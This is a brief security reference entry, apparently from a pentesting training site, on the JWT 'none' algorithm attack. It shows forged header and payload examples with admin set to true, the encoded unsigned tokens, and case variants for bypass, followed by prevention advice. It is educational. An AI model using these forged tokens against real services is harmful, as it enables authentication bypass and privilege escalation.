JWT None Algorithm Attack

JWT None Algorithm Attack exploits JWT implementations that accept tokens with the algorithm set to "none". This unsecured JWT type was intended for cases where integrity is guaranteed by other means, but vulnerable libraries accept it without verification.

How It Works

The attacker modifies a JWT, sets the algorithm header to "none" (or variants like "None", "NONE", "nOnE"), and removes the signature. Vulnerable servers accept this token without any signature verification.

Example

// Original signed token
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
eyJzdWIiOiJ1c2VyIiwiYWRtaW4iOmZhbHNlfQ.
[valid_signature]

// Forged token with none algorithm
{"alg": "none", "typ": "JWT"}
{"sub": "user", "admin": true}

// Encoded (note: empty signature, trailing dot)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.
eyJzdWIiOiJ1c2VyIiwiYWRtaW4iOnRydWV9.

// Or without trailing dot (some libraries)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.
eyJzdWIiOiJ1c2VyIiwiYWRtaW4iOnRydWV9

Bypass Variants

• "alg": "none"
• "alg": "None"
• "alg": "NONE"
• "alg": "nOnE" (case variations)

Prevention

• Explicitly reject "none" algorithm in verification
• Whitelist allowed algorithms
• Use updated JWT libraries (most now reject "none")
• Always require signature verification

PentesterLab Exercises

• JWT Exercises

See Also

• JSON Web Token (JWT)
• JWT Algorithm Confusion Attack